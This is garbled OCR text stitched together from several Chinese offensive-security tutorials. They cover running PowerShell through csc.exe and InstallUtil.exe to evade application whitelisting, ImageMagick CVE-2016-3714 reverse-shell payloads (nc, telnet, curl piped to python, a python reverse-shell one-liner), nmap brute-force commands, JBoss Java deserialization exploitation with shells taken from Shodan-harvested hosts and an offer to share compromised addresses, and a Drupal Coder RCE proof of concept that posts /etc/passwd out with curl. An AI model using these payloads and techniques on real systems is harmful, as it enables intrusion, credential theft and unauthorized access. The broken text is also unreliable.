脚本 ， 脚 本 路 径 定 义 在 符号 @” 的 双 引 号 之 中 。 在 我 的 测试 环境 中 ， 我 的 


PowerShell 脚 本 存储 路 径 为 “C:\Users\fmc\Desktop\PowerUp.ps1”， 接 下 来 的 代码 
用 来 设置 PowerShell 脚 本 在 执行 过 程 中 所 要 使 用 到 的 变量 和 参数 。 


最 后 ， 在 pipeline.Invoke() 函 数 被 调用 之 后 ， 也 就 意味 着 我 们 的 PowerShell 脚 本 被 执 
行 了 。 将 下 列 代码 添加 到 Program.cs 文 件 的 末尾 处 : 


public class Mycode 

L 

public static void Exec() 

L 

string command = System.IO.File.ReadAllText(Q"C:NUsersNfmcNDesk 
top\PowerUp.ps1"); 

RunspaceConfiguration rspacecfg = RunspaceConfiguration.Create( 
); 


Runspace rspace - RunspaceFactory.CreateRunspace(rspacecfg); 





rspace.Open( ); 

Pipeline pipeline - rspace.CreatePipeline(); 
pipeline.Commands.AddScript (command); 
pipeline.Invoke(); 

} 

} 


Program.cs 文 件 完整 的 代码 如 下 所 示 : 


using System; 

using System.Configuration.Install; 

using System.Runtime.InteropServices; 

using System.Management.Automation.Runspaces; 
public class Program 

{ 

public static void Main() 

t 

} 


} 
[System.ComponentModel.RunInstaller(true)] 


public class Sample : System.Configuration.Install.Installer 

{ 

public override void Uninstall(System.Collections.IDictionary s 
avedState) 

t 

Mycode.Exec(); 

} 

} 

public class Mycode 

{ 

public static void Exec() 

{ 

string command = System.IO.File.ReadAllText(Q"C:NUsersNfmcNDesk 
topNPowerUp.ps1"); 

RunspaceConfiguration rspacecfg - RunspaceConfiguration.Create( 
); 

Runspace rspace = RunspaceFactory.CreateRunspace(rspacecfg); 
rspace.Open(); 

Pipeline pipeline = rspace.CreatePipeline(); 
pipeline.Commands.AddScript (command); 

pipeline.Invoke(); 

} 

} 


在 这 个 例子 中 ， 我 使 用 到 了 Veil-Framework 的 PowerUp 脚 本 ， 你 可 以 在 PowerShell 
的 命令 行 工 具 中 执行 下 列 命 令 ， 然 后 将 运行 结果 保存 到 一 个 文件 中 : 


Import-Module PowerUp.ps1 
Invoke-AllChecks -Verbose | Out-File C:\Users\fmc\Desktop\allche 
cks. txt 


为 了 保证 这 个 方法 能 够 正确 地 调用 我 们 所 需 的 函数 ， 我 们 还 需要 在 脚本 的 末尾 调用 
一 个 显 式 防 数 。 打 开 PowerUp.ps1 脚 本 ， 然 后 在 脚本 文件 的 底部 添加 下 列 函 数 调用 
语句 ， 请 一 定 要 确保 语句 中 的 Out-File 参 数 设 置 正 确 。 保 存 文件 ， 并 退出 编辑 器 。 


Invoke-AllChecks -Verbose | Out-File C:\Users\fmc\Desktop\allche 
cks.txt 


Ej PowerUp ps1 日 
2270 . $Results = Get-Webconfig | Where-Object (S ) 
SResults | Format st 
日 if (SHTMLReport) { 
$Results | ConvertTo-HTML -Head $Header -Body 
} 


$Results = Get-ApplicationHost | Where-Object {$ } 
$Results | Format-List 

日 if (SHTMLReport) { 

| $Results | ConvertTo-HTML -Head $Header -Body 
) 


Y if(SHTMLReport) { 
} 
} 


现在 ， 我 们 需要 使 用 csc.exe 工 具 来 对 我 们 的 程序 进行 编译 。 下 面 这 段 命令 可 以 编译 
我 们 的 Program.cs 文 件 ， 并 生成 一 个 名 为 “powerup.exe” 的 可 执行 文件 : 








C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 
/r:C:\Windows\assembly\GAC _MSIL\System.Management .Automation\1.0 
.0.0 

31bf3856ad364e35\System.Management.Automation.dll /unsafe /platf 
orm: anycpu 

/out:C:\Users\fmc\Desktop\powerup.exe C:\Users\fmc\Desktop\Progr 
am.cs 


请 等 一 下 ， 不 是 说 好 了 cmd.exe 已 经 被 禁用 了 吗 ? 别 担心 ， 打 开 你 的 资源 管理 器 ， 
然后 切换 到 下 面 这 个 目录 : 


禁用 了 PowerShell 又 如 何 ? 看 我 如 何 用 PowerShell 绕 过 应 用 白 名 单 、 环 境 限 制 、 以 
A À He ARNG 


7 
x 
HEU 


C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ 


鼠标 右键 点 击 CSc.exe 程 序 ， 然 后 在 弹出 菜单 中 选择 "创建 快捷 方式 ”。 点 击 之 后 ， 系 
统 会 弹出 一 个 提示 框 ， 提 示 信 息 会 告诉 你 不 能 在 这 里 创建 快捷 方式 ， 如 果 你 一 定 要 
的 话 ， 系 统 可 以 帮 你 在 桌面 创建 一 个 快捷 方式 。 


Local Disk (C:) » Windows » Microsoft.NET » Framework64 » v20.50727 » | ~|¢. 


Open New folder 





= Name a died Type 

lop |. | CLR.mof.uninstall 1) PM UNINSTALL 
æ CORPerf "dil 11/4/2010 7:56PM Application: 

nloads — 


[mes 

























$4.1 csc.exe Open 
ST Wy Run as administrator 
L_] csc.rsp 
E | cscomp.dil T-Zip Eel, 
T %| cscompmgd.dil CRC SHA FL 
E | Culture.dll (af Edit with Notepad++ ' 
a | CustomMarshalers.dll Pin to Taskbar i 
" 7 cvtres Pin to Start Menu 
iter 83 dfsve Send to > 
| Disk (C) ‘à, diasymreader.dll i 
E dv aspnetmmc Cut 
k a dw20 Copy 
d ~ dll i 


http://p8.qhimg. com/t01a979d6b8462cc709. png 现在 ， 请 回 到 系统 桌面 。 和 鼠标 右 
键 点 击 csc.eXxe 程 序 的 快捷 方式 ， 然 后 在 菜单 中 选择 “属性 ”。 
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禁用 了 PowerShell 又 如 何 ? 看 我 如 何 用 PowerShell 绕 过 应 用 和 白 名 单 、 环 境 限 制 、 以 
及 杀毒 软件 


Open 
Open file location 


Run as administrator 
7-Zip 

CRC SHA 

Edit with Notepad++ 
Pin to Taskbar 

Pin to Start Menu 


Copy 


croi reperiles 


Delete 


Rename 





， 在 属性 窗口 的 “快捷 方 
式 ” 那 一 栏 中 ， 用 下 列 信 息 蔡 换 掉 “目标 (T) "中 的 全 部 内 容 (请 确保 文件 名 和 其 他 
的 信息 是 正确 的 ) : 
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C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 
/r:C:\Windows\assembly\GAC_MSIL\System.Management .Automation\1.0 
.0.0 

31bf3856ad364e35NSystem.Management.Automation.dll /unsafe /platf 
orm:anycpu 

/out :C:\Users\fmc\Desktop\powerup.exe 


设置 完成 之 后 ， 点 击 “ 应 用 ”， 然 后 关闭 "属性" 窗口。 我 们 刚刚 所 做 的 就 是 设置 
csc.exe 运 行 时 所 需 的 参数 。 我 们 在 这 里 之 所 以 没有 设置 Program.cs 程 序 的 文件 路 
径 ， 主 要 是 因为 如 下 两 个 原因 : (1) 主要 原因 是 “目标 (T) "这 一 栏 有 最 大 字符 数 
量 的 限制 ， 如 果 我 们 将 Program.cs 文 件 的 完整 路 径 添 加 进去 的 话 ， 肯 定 会 超过 其 所 
能 接受 的 最 大 字符 长 度 (2) 我 们 可 以 直接 将 Program.cs 文 件 拖 找到 csc.exe 快 捷 
方式 上 ，Ccsc.eXxe 程 序 将 会 自动 加 载 Program.cs 文 件 。 


禁用 了 PowerShell 又 如 何 ? 看 我 如 何 用 PowerShell 绕 过 应 用 白 名 单 、 环 境 限 制 、 以 
及 杀毒 软件 








Target location: v2.0.50727 
Target: anycpu /out:C:\Users\fmc\Desktop \powerup exe 








在 ， 直 接 将 我 们 的 Program.cs 文 件 拖 搜 到 桌面 的 csc.exe 图 标 上 ， 程 序 会 自动 编译 
该 文件 。 如 果 不 出 什么 意外 的 话 ， 桌 面 上 应 该 会 出 现 一 个 名 为 "powerup.exe" 的 文 
件 。 那 么 茶 喜 你 ， 即 便 是 在 不 使 用 命令 行 工 具 或 者 Visual Studio 的 情况 下 ， 你 依然 
成 功 地 编译 好 了 一 个 C# 程 序 了 ! 
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EM a 


Proc grames POWETU - 


E E 


powerup 





最 后 ， 我 们 需要 使 
用 InstallUtil.exe 来 运行 我 们 的 程序 ， 这 一 步骤 与 csc.exe 程 序 的 使 用 方法 差不多 。 切 
换 到 下 面 这 个 目录 : 


C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ 


其 他 步骤 基本 相同 ， 但 是 请 注意 ，|nstallUtil.exe 快 捷 方 式 中 的 “目标 (T) ”这 一 栏 数 
据 需 要 用 下 列 信息 替换 : 


C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe 
/logfile=C:\Users\fmc\Desktop\log.txt /LogToConsole=false /U 


禁用 了 PowerShell 又 如 何 ? 看 我 如 何 用 PowerShell 绕 过 应 用 白 名 单 、 环 境 限 制 、 以 
及 杀毒 软件 


点 击 “ 应 用 ”， 然 后 关闭 窗口 。 


Target location: v2.0.50727 


Target: ers mc Desktop Vog bt /LogToConsole-false /U 











回 到 桌面 ， 将 powerup.exe 程 序 拖 到 InstallUtil 程 序 的 快捷 方式 上 。 
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5 È 


Programes Power 









PCR 
Lot 


SHOrteUT . 
aan 现在 ， 当 脚本 开始 运行 后 ， 屏 幕 上 应 


该 会 显示 一 个 命令 行 界面 。 但 是 ， 当 你 打开 任务 管理 器 之 后 ， 你 就 会 发 现 cmd.exe 


n amm 
Microsoft CR)» .NET Framework Installation utility Version 2.0.59727.5428 
Copyright <c? Microsoft Corporation. All rights reserved. 








File Options View Help 


| Applications | Processes | Services | Performance | Networking | Users 


Image Name User Name CPU Memory (... Description 


Me YET EVEN ERE TENETESERTRTEETETTET EET VTN ERN EERENSTENEENTENE VEN EE EEYENEENTENTENTENT TEE TEN ERRER RR RRR RRR ERRER ERRER ERRER ERRER KERER ERRER RRR ERRER rra 


f AppVShNotify... fmc 00 
conhost.exe fmc 00 
conhost.exe fmc 00 
conhost.exe fmc 01 
csrss.exe 00 
dilhost.exe fmc 00 
dwm.exe fmc 00 
EXCEL.EXE *32 fmc 00 
explorer.exe fmc 00 










jusched.exe *32 fmc 00 
Microsoft.VsH... fmc 00 
notepad++.e... fmc 00 
sc.exe *32 fmc 00 
| Ay Show processes from all users - 


1,208K Console ... 
1,000K Console ... 
1,288K Console.. 
6,152K 
1,704K COM Surr... 
70,868K Desktop... 
23,648K Microsoft ... 
37,852K Windows... 
22,328 NET Fra... 
ava Upd... 
3,340K  JavaUpd... 
24,064K Microsoft... 
6,680K Notepad... 
504 K 









m 









End Process 





我 们 可 以 在 命令 行 工 具 中 输入 下 列 命令 来 确认 进程 信息 : 


wmic process list full > Desktop\save.txt 


EN C:\Windows\system32\cmd.exe 


C:\ Users \fmc2umic process lis 


t 


full > Desktop\save 


„txt 





在 对 “wmic" 命 令 的 输出 数据 进行 了 分 析 之 后 ， 我 们 发 现 InstallUtil,exe 其 实 是 通过 


explorer.exe 调 用 的 ， 而 并 非 是 cmd.exe 。 


禁用 了 PowerShell 又 如 何 ? 看 我 如 何 用 PowerShell 绕 过 应 用 白 名 单 、 环 境 限制 、 以 


及 杀毒 软件 





















DescriptioneInstallutil.exe 
xecutablePathec : windows Microsoft. NET Framework v2.0. 50727 1nstallutíl. exe 


Handle-1776 
Handlecount=225 
Insta] lDate= 
KernelModeTime-936006 


Pageraults-11636 


ParentProcesside2628 
y Ü 







QuotaNonPagedPoolusage«24 


CommandL ine=c : \windows\explorer. EXE 
Name N- IMK KE 
Description=explorer.exe 
Executablepath=c:\windows\Eexplorer.ExE 
= t Ü = P= 

Hand] e=2628 

Hand] ecount=1211 

InstallDate- 

KernelModeTime-265045699 
Maximumworkingsetsize-1380 
Minimumworkingsetsize-200 
Name-explorer.exe 

OSName-Microsoft windows 7 Enterprise |C:\w ows | \Device\HarddiskO\Partitionl 
otheroper ati oncount=315596 

OtherTransfercount-12611493 

PageFaults-264600 

PageFi leUsage=57496 


ParentProcessId-2552 is 
PeakPageFileusage-70532 

Peakvirtualsize-452239360 

Peakworkingsetsize-98460 Parent process for 
Prior ity=8 

Processid=2628 4 instal ies fh 
CUUTANUTIPaUCUPDO | Us age=81 

QuotaPagedPoolusage-569 UTB case 
QuotaPeakNonPagedPoolusage-89 


QuotaPeakPagedPoolusage-760 
Readoper at ioncount=7745 


如 果 不 出 意外 的 话 ， 当 脚本 执行 完毕 后 ， 你 的 桌面 上 将 会 出 现 一 个 名 
为 “allchecks.txt" 的 文件 ， 打 开 文 件 你 就 可 以 看 到 PowerUp.ps1 的 输出 信息 了 。 


















Commandt ine="c :\windows\Microsoft.NET\Framework\v2.0.50727\1nstallutil.exe" /logfile-C:\users\fmc\nesktop\log. txt /LogToconsole-false 
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禁用 了 PowerShell 又 如 何 ? 看 我 如 何 用 PowerShell 绕 过 应 用 和 白 名 单 、 环 境 限 制 、 以 
及 杀毒 软件 
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禁用 了 PowerShell 又 如 何 ? 看 我 如 何 用 PowerShell 绕 过 应 用 白 名 单 、 环 境 限制 、 以 
及 杀毒 软件 


la checks - | 


File Edit Format View Help 


*] Running Invoke-Allchecks 

*] checking if user is in a local group with administrative pones 
+] User is in a local group that grants administrative privileges! 

+] Run a BypassUAC attack to elevate privileges to admin. 

*] checking for unquoted service paths... 

*] checking service executable and argument permissions... 

*] checking service permissions... 

*] checking %PATH% for potentially hijackable .d11 locations... 


i 


HijackablePath : C:\python27\ 
AbuseFunction : rn -OutputFile ‘'C:\Python27\\wlbsctr1.d11° -Comman 


HijackablePath : C:\python27\scripts\ 
AbuseFunction : ET -OutputFile "C:\python27\scripts\\wlbsctr1.d11" 
-Command ' D 


Checking for Autologon credentials in registry... 
Checking for vulnerable registry autoruns and configs... 

| Checking for vulnerable schtask files/configs... 
Checking for unattended install files... 


[*] Checking for ac registry key... 
* 

LC 

[* 

[* 

unattendPath : C:\windows\Panther \Unattend. xm] 


E] Checking for encrypted web.config strings... 
[*] checking for encrypted application pool and virtual directory passwords... 


Ey: 
NEZ 


C 


在 这 篇 文章 中 ， 我 介绍 了 一 种 能 够 在 启用 了 应 用 白 名 单 ， 并 且 禁 用 了 powershell.exe 
和 cmd .exe 的 环境 下 执行 PowerShe11 脚 本 的 方法 。 但 是 ， 在 实际 的 使 用 过 程 中 ， 你 还 
应 该 注意 以 下 几 点 : 

工 .确保 你 的 脚本 没有 使 用 NMrite-Host : 

2 ,这 种 方法 有 可 能 会 导致 程序 发 生前 溃 ; 

3 .建议 使 用 Write-Output 或 者 Out -File : 

4. 如 果 你 的 脚本 需要 用 户 交 互 的 话 ， 建 议 使 用 -Force 选 项 ; 


以 上 就 是 我 们 今天 的 全 部 内 容 ， 不 知道 大 家 是 否 满意 呢 ? 提醒 大 家 一 下 ， 这 种 方法 同样 


可 以 用 来 绕 过 反 病 毒 软件 ， 我 们 将 会 在 下 一 期 的 教程 中 一 步 一 步 教 大 家 如 何 操 作 ， 请 大 
家 持续 关注 安全 客 ! 
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ImageMagick “A 7 M] iX 


5 月 3 日 ， 图 像 处 理 软件 ImageMagick 就 被 公布 出 一 个 严 RCE (CVE-2016- 
3714) :  KREAWMNMAATUTERTS JR IESUS RUE SAPR A SE TA d 
此 漏洞 延伸 ，ImageMagick 被 许多 编程 语言 所 支持 ， dn > C++ > PHP (通过 ima 
gick Æ) ，Python 和 Ruby 等 ， 并 被 部 署 在 数 以 百 万 计 的 网 站 ， 博 客 ， 社 交 媒 体 平台 
和 流行 的 内 容 管理 系统 (CMS)， 例 如 WordPress 和 Drupal。 


利用 这 个 漏洞 ， 可 以 通过 上 传 一 张 含 有 恶意 代码 的 图 片 ， 可 导致 命令 执行 。 这 里 我 
们 主要 讲 的 是 如 何 测 试 漏洞 ， 可 以 写 文件 、 反 漳 shel1 > wget 等 。 本 地 拱 
境 ， 在 kali2.0 中 ，lamp 环 境 下 ， 安 装 了 php 的 jmagick 扩 展 ， 调 用 ImageMagick 进 
行 上 传 的 图 片 处 理 


<?php 
if ($ FILES["file"]["error"]» 0) { 
echo Enmore SLETLES tite | errore] 5€ 
} 
else { 
$temp file = $ FILES["file"]["tmp name"]; 
$dest file = "./images/".md5(uniqid(rand())).".png"; 


$thumb = new Imagick(); 
$thumb-»readImage($temp file); 
$thumb-»writelmage($dest file); 
$thumb->clear(); 
$thumb->destroy(); 

unlink($temp file); 

echo $dest file; 


1. netcat 


前 提 是 server 服 务 器 上 安装 了 netcat，poc 如 下 


push graphic-context 
viewbox © © 640 480 
fill 'url(https://example.com/image.jpg"|nc xxx.xxx.xxx.xxx 2015 


-e /bin/bash")' 
pop graphic-context 


在 反弹 的 监听 主机 上 监听 


nc -l -vv -p 2015 


测试 处 ， 点 击 上 传 后 





2. telnet 


telnet 在 linux 的 各 大 发 行 版 中 telnet 一 般 黑 认 安 装 ，poc 如 下 


push graphic-context 

viewbox 0 © 640 480 

fill 'url(https://example.com/image.jpg"|telnet x.x.x.x 2015")' 
pop graphic-context 


在 反弹 的 监听 主机 上 


ro @VM-251-122-de 


监听 ， 指 令 同 上 





3. curl&python 


利用 curl 下 载 python 文 件 后 ， 执 行 python 脚 本 反弹 


push graphic-context 
viewbox © © 640 480 
ROUE D ese curt SS http x-<-x-x/ Lest py | python =): 


pop graphic-contex 
国 EE | 


这 里 需要 一 个 外 网 服务 器 存放 你 的 脚本 ,python 脚 本 内 容 如 下 


import os,socket,pty;s=socket.socket(socket .AF_INET, socket .SOCK_ 
STREAM) ;s.connect(("x.x.x.x",2015));os.dup2(s.fileno(),0);os.dup 
2(s.fileno(),1);os.dup2(s.fileno(),2);os.unsetenv("HISTFILE");os 
.unsetenv("HISTFILESIZE");os.unsetenv("HISTSIZE");os.unsetenv("H 
ISTORY");os.unsetenv("HISTSAVE");os.unsetenv("HISTZONE");os.unse 
tenv("HISTLOG");os.unsetenv("HISTCMD");os.putenv("HISTFILE","/de 
v/null");os.putenv("HISTSIZE","0");os.putenv("HISTFILESIZE","0") 
;pty.spawn("/bin/sh");s.close() 


注意 更 改 脚本 里 的 反弹 jp 和 端口 ， 测 试 成 功 


bian:/var/www/html# nc - 





Unknown host 


4. wget 


在 远程 服务 上 写 个 php 脚 本 记录 访问 ip， 


<?php 

$ip = $ SERVER['REMOTE ADDR']; 

file put contents("log.txt", "ping from ".$ip, FILE APPEND); 
?> 


poc 如 下 


push graphic-context 

viewbox © © 640 480 

fill 'url(https://example.com/image.jpg"|wget http://x.x.x.x/img 
-php")' 

pop graphic-context 


命令 执行 成 功 ， 则 在 log.txt 中 会 记录 来 访 ip 
| C |D 1585 /log.txt 


ping from 182. n 


nmap 


Nmap 的 简单 爆破 


nmap -p445 -Script smb-brute.nse -Script-args userdb=./user.txt, 
passdb=./pass.txt 192.168.30.128 


nmap -p21 -ST -script ftp-brute.nse -Script-args userdb=./user.t 
xt,passdb=./pass.txt 192.168.30.128 


nmap -p23 -script telnet-brute.nse -script-args userdb=./user.tx 
t,passdb=./pass.txt 192.168.30.128 


nmap -p3306 -script mysql-brute.nse -script-args userdb=./user.t 
xt,passdb=./pass.txt 192.168.30.128 


JAVA 反 序 列 化 exp 及 使 用 方法 


这 两 天 很 火 的 java 反 序列 化 漏洞 ， 看 到 乌云 大 牛 已 经 开始 刷 分 ， 于 是 找 来 实 
践 一 波 


eXp 来 源 


ysoserial 


https://github.com/frohoff/ysoserial 


这 个 项 目 针 对 不 同 的 java 产 品 给 出 了 简单 的 漏洞 利用 脚本 : 

其 中 weblogic 和 jenkins 提 供 python 脚 本， 但 需 自 己 加 载 payload : 
而 对 于 jboss 和 websphere 则 提供 了 poc 的 数据 包 : 

更 多 信息 在 : foxglovesecurity.com 


foxlovesec 


https://github.com/foxglovesec/JavaUnserializeExploits 


java 项 目 ， 用 于 生成 payload， 配 合 前 面 的 漏洞 利用 脚本 使 用 ， 便 可 完成 exp : 


iswin 


http://www.iswin.org/2015/11/13/Apache-CommonsCollections- 
Deserialized-Vulnerability/ 


e 随 风 师 傅 分 析 漏 洞 原理 ， 并 基于 foxglovesec 提 供 的 payload 生 成 脚本 ， 给 出 基于 
两 种 不 同方 法 的 改进 版 exp 和 poc，exp 里 调用 了 随 风 师 傅 的 java 版 反弹 shell 方 
法 ， 它 的 好 处 是 不 依赖 操作 系统 环境 ， 兼 容 Win 和 |inux， 使 反弹 shell 成 功率 和 稳定 
性 更 高 ， 


随后 ， 随 风 师 侍 在 zone.wooyun 发 帖 教学 exp 的 使 用 ， 并 积极 指点 新 手 白 帽 子 进行 实 
BR: 
http ://zone.wooyun.org/content/23905 


JAVA 反 序 列 化 exp 及 使 用 方法 


` 


实践 


资源 打包 


JBOSS 的 部 分 已 整理 到 github 
https://github.com/Xyntax/JBoss-exp 
e Java payload 随 风 师 侍 给 出 的 改良 版 exp 和 foxlove 的 项 目 代 码 
e jbossexp.py 一 个 利用 脚本 ， 用 于 发 包 
e kiss10500.bin/kiss10501.bin 我 测试 时 生成 的 两 个 payload 
e shodan_data.xml 从 shodan 拿 了 一 些 ]JBOSS 服 务 的 主机 IP 
e shodan data.xml sorted 整理 后 的 Url|， 用 于 批量 poc 


payload 生 成 


1， 用 eclipse 打 开 Java_payload 项 目 ， 按 如 下 路 径 找 到 main.java 


Z Package Explorer X| B8 > v RE 
* j? aaaaa 
Y $9 src 
> 9B ysoserial 
”出 ysoserial.payloads 
» (J) CommonsCollections1.java 
» [À CommonsCollections2.java 
» (J) Groovyl.java 
» [f ObjectPayload.java 
» |J] Springl.java 
^ 8 ysoserial.payloads.annotation 
^ 98 ysoserial.payloads.util 
> gi JRE System Library [jdk1.8.0_65] 


» g& Referenced Libraries 


1， 代 码 很 清晰 ， 找 到 ip 和 端口 的 地 方 ， 卉 入 自己 机 器 上 用 于 接受 反弹 shell 的 公 网 jp 和 


port: 然后 下 面 的 路 径 是 生成 payload 的 保存 地 址 : 
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了 


public static void main(String[] args) throws Exception { 
GeneratePayload(Reverse Payload("139.129.132.xxx|, 10501), 
n /home/xy/k1ss10501.bin"); 


~ 


1. 运行 main.java 不 报错 即 可 
2. 到 指定 路 径 检 查 payload 文 件 是 否 已 经 生成 


确定 目标 


在 shodan_data,xml 列 表 里 找 几 个 网 站 ， 放 到 sebug 的 照妖镜 里 测试 一 下 是 否 存 在 沁 
iA - 


https: //www.sebug.net/monster/ 
有 漏洞 的 结果 是 这 个 样子 : 


JBoss “Java 反 序 列 化 "过 程 远程 命令 执行 漏洞 


http://www.xddedu.com 


开始 检测 


该 目标 存在 JBoss "Java 反 序列 化 "过 程 远 程 命令 执行 漏洞 





反弹 shell 


首先 打开 自己 在 公 网 接收 shell 的 主机 
使 用 以 下 命令 监听 端口 ， 等 待 连接 
nc -lv 10501 


然后 开 尼 另 一 个 命令 行 ， 使 用 python 的 发 包 脚本 向 目标 机 发 送 payload : 


L 


命令 格式 python jbossexp.py [url] [port] [payload] 


随后 公 网 主机 会 接收 到 反弹 的 Shell， 如 下 图 - 


$ python jbossexp. py http: //218. 247. 135. 151/ 8 


$i 


01 : 
0 kiss10501. bin 


): \unis\4, 2. 2. GA- Lams\ bin>4C 

root(Gi728g9kpnm3Z: - nc -lv 10501 

Connection from 218. 247. 135.151 port 10501 [tcp/*] accepted 
Microsoft Windows [485 5. 2.3790 

C) 20000 1985-2003 Microsoft Corp 





G: \appian\ bin jboss\ jboss- 5. 1. 0. GA bin>| | 


并 不 是 所 有 sebug 验 证 出 漏洞 的 地 址 都 能 顺利 反弹 shell， 经 个 人 测试 ， 成 功率 在 
50%-60% 左 右 ， 请 多 加 尝试 ! 


可 以 邮箱 联系 我 索取 已 经 验证 成 功 并 拿 到 shell 的 地 址 ， 


天 上 繁 b， 乃 前 华 所 装 ， 虽 历历 在 目 ， 仍 不 可 尽数 . 向 大 牛 们 学 习 ! 


http://yaseng.org/java-unserialize-rce-and-jboss-rce.html? 
utm. source-tuicool&utm medium-referral 


http://www.nxadmin.com/penetration/1381.html 


http://www.iswin.org/2015/11/13/Apache-CommonsCollections- 
Deserialized-Vulnerability/ 


https://www.sebug.net/vuldb/ssvid-89723 
http://www.heysec.org/archives/156 


http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere- 
jboss-jenkins-opennms-and-your-application-have-in-common-this- 
vulnerability/#jboss 
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作者 : 曾 鸿 坤 @ 安 恒安 全 研究 院 、 黄 伟 术 @ 安 恒安 全 研究 院 


AK, wy. 
AS 


月 

今年 7 月 13 日 ，Drupal 发 布 了 一 个 高 危 漏 洞 公告 (DRUPAL-SA-CONTRIB-2016- 
ae , hs 远程 代码 执行 (在 没有 尼 用 模块 的 情况 下 ， 漏 洞 也 可 以 被 触 
A) 这 个 模块 不 是 Drupal 默 认 自 带 的 模块 ， 所 以 影响 范围 有 限 。 


Drupal 的 Coder 模 块 主要 有 以 下 两 个 功能 : 
1、 用 来 检查 代码 文件 是 否 符 合 Drupal 编 码 标准 ， 是 否 兼容 当前 版 本 的 Drupal API 。 
2、 用 来 将 加 模块 升级 至 符合 当前 Drupal 标 准 的 模块 。 


影响 范围 : 


Coder module 7.x-1.x versions prior to 7.x-1.3. Coder module 7.x-2.x versions 
prior to 7.x-2.6. 


分 析 
测试 环境 : Drupal 7.50, Coder 7.x-2.5. 


我 们 从 网 上 找到 个 现 有 的 POC 
(https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5) 内 容 如 下 : 


Drupal Coder 模块 远程 命令 执行 分 析 (SA-CONTRIB-2016-039) 


<?php 
# Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039) 


# https://www.drupal.org/node/2765575 
# by RazOr (http://razOr.name) 


$cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd"; 
$host = "http://localhost:81/drupal-7.12/"; 


$a = array( 
"upgrades" => array( 
"coder upgrade" => array( 
"module" => "color", 
"files" => array("color.module" ) 


); 


"extensions" -» array("module"), 
"items" => array (array("old_dir"=>"test; $cmd;", "new dir"-» 


"test")), 
"paths" => array( 
"modules base" => "../../../", 
"files base" => "../../../../sites/default/files" 
) 
); 
$payload - serialize($a); 
file get contents($host . "/modules/coder/coder upgrade/scripts/ 
coder upgrade.run.php?file-data://text/plain;base64," . base64 e 
ncode($payload) ); 
?> 


EEE." ÁÁ | à 


但 是 在 我 们 的 环境 下 ， 上 面 POC 无 法 正常 使 用 。 然 后 就 开始 了 我 们 的 修改 POC 和 分 
NIS A o 


4& X fHsites/all/modules/coder/coder upgrade/scripts/coder upgrade.run.php #4) 7F 
头 ， 有 这 样 两 行 代码 : 


set error handler("error handler"); 
set _exception_handler{ “exception handler”); 
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导致 后 面 代 码 碰 到 Warning 后 都 会 自动 退出 ， 所 以 整个 POC 之 路 有 点 曲折 。 


0. 我 们 先 快速 查找 下 导致 命令 注入 的 位 置 。 


通过 POC 可 知 是 从 items[f'old_dir] 注 入 命令 ， 所 以 我 们 跟踪 $items 这 个 变量 ， 得 到 
以 下 路 线 。 


1) 从 coder_upgrade.run.php 开 始 ->$item 变 量 进 入 

coder upgrade start($upgrades, $extensions, $items) 这 个 函数 . 2) 

coder upgrade _start 函 数 声明 在 main.inc 文 件 ， 之 后 $items 变 成 $item 进 入 

coder upgrade make patch file($item, $ coder upgrade replace files) À » 
3) coder upgrade make patch fille 有 函数 声明 在 仍然 在 main.inc 文 件 ， 最 后 $item 内 
的 old_ dir 和 new diri X 81 > 3t A shell exec("diff -up -r {$old_dir} {$new_ dir} > 
{$patch_filenamey);， 从 而 导致 命令 注入 。 


1. 下 面 我 们 看 coder upgrade.run.php 的 代码 : 


.//ignore 
$usage = array(); 
save memory usage('start', $usage); 


define('DRUPAL ROOT', getcwd()); 


ini set('display errors', 1); 

ini set('memory limit', '128M'); 

ini set('max execution time', 180); 

set error handler("error handler"); 

set exception handler("exception handler"); 


$path = extract arguments(); //1.1. 即 获取 $_GET[' 
if (is null($path)) { 

echo 'No path to parameter file'; 

return 2; 


// Load runtime parameters. 
$parameters = unserialize(file_get_contents($path)); //1.2.355:5| 


Ie E T ES 
N ITE R GE a 


~ LAK LL >= ta 人 A. JL $= w JES 





Drupal Coder 1% 2K 32 42 oF S 441 PT (SA-CONTRIB-2016-039) 


foreach ($parameters as $key => $variable) { 
$$key = $variable; 
} 


save_memory_usage('load runtime parameters', $usage); 


// Set global variables (whose names do not align with extracted 
parameters). 

$ coder upgrade variables = $variables; //1.3.4+2$variables#2£# 
盖 ， 不 然 会 产生 未 声明 变量 警告 而 退出 。 

$ coder upgrade files base = $paths['files base']; //1.4. $path 

要 和 窗 益 ， 不 然 也 会 产生 警告 ， 下 面 两 行 同样 情况 。 

$ coder upgrade libraries base = $paths['libraries_base']; 

$ coder upgrade modules base = $paths['modules base']; 


// Load core theme cache. 
$ coder upgrade theme registry - array(); 
if (is file($theme cache)) { //1.5.$theme cache € E 
$ coder upgrade theme registry - unserialize(file get contents 
($theme cache)); 
} 


save_memory_usage('load core theme cache', $usage); 


// Load coder_upgrade bootstrap code. 
$path = $ coder upgrade modules base . '/coder/coder_upgrade'; 
$files - array( 

'coder upgrade.inc', 

'includes/main.inc', 

'includes/utility.inc', 
); 
foreach ($files as $file) { 

require once DRUPAL ROOT . '/' . $path . "/$file"; //1.6. xa $ 
要 正常 包含 文件 ， 不 能 产生 敬告，POC 里 面 的 nodules_base=> ../../../^ > XX 
的 目录 结构 可 以 符合 条 件 。 
} 


coder_upgrade_path_clear('memory'); //1.7. 此 处 会 将 一 些 调试 信息 写 入 指 
定 文件 ， 写 入 目录 由 POC 里 面 的 files_base 指 定 ， 但 是 POC 里 面 的 `../../../../si 
tes/default/files` ， 在 我 们 的 测试 环境 下 ， 并 没有 这 个 目录 ， 导 致 会 产生 警告 而 
退出 ， 所 以 我 们 将 它 修 改 为 coder 模 块 的 目录 `../.. ， 这 样 也 避免 了 环境 不 同 而 导致 
POC 不 能 使 用 。 


print memory usage($usage); 
coder upgrade memory print('load coder upgrade bootstrap code'); 


$success = coder upgrade start($upgrades, $extensions, $items); 
//1.8. 此 处 是 关键 ， 命令 注入 的 入 口 & 


所 以 要 执行 到 coder upgrade start， 同 时 满足 上 面 分 析 的 所 有 条 件 ，POC 已 经 被 我 
们 修改 为 : 


$host = "http://localhost:82/"; 


